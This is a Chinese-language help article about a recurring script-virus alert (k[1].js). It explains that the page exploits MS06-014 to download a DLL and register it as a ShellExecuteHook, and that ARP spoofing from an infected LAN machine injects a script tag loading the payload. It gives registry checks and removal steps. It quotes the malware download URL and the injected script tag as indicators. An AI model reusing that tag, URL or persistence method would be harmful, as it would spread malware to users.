Trojan.DL.VBS.Agent.cpb(k[1].js)脚本病毒的解决方法

脚本病毒：Trojan.DL.VBS.Agent.cpb （文件名为k[1].js)老是在internet临时文件里出现，瑞星监控杀了又来，如此反复着！我试图清空临时文件，但一上网打开网页（不管是哪些网页），那个k[1].js又会被瑞星监控到。这是怎么回事呀？是误报吗？

　　该网页利用MS06-014漏洞，下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接写入注册表


Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}指向C:\WINDOWS\winhelp.dll


　　由于瑞星查杀了k.js，一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒，原因是：

　　局域网中有电脑中了此毒，然后向局域网中其他电脑发动ARP攻击，将其他用户接收到的网络数据包中加入


Code:
<script src="https://cdn.zhanzhang360.cn/imgupload/007335/k.js" type="text/javascript"></script>


的代码，导致其他用户访问任何网站时都会报毒。

　　所以，首先，确认你的电脑是否中毒：

　　确认以下注册表路径是否存在：


Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]


　　如果存在，尝试在安全模式下删除这两个注册表路径。

　　如果不存在，说明不是你本机的中毒问题，而是你受到ARP攻击的缘故。

　　这种情况下，请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑，然后将其断网查毒。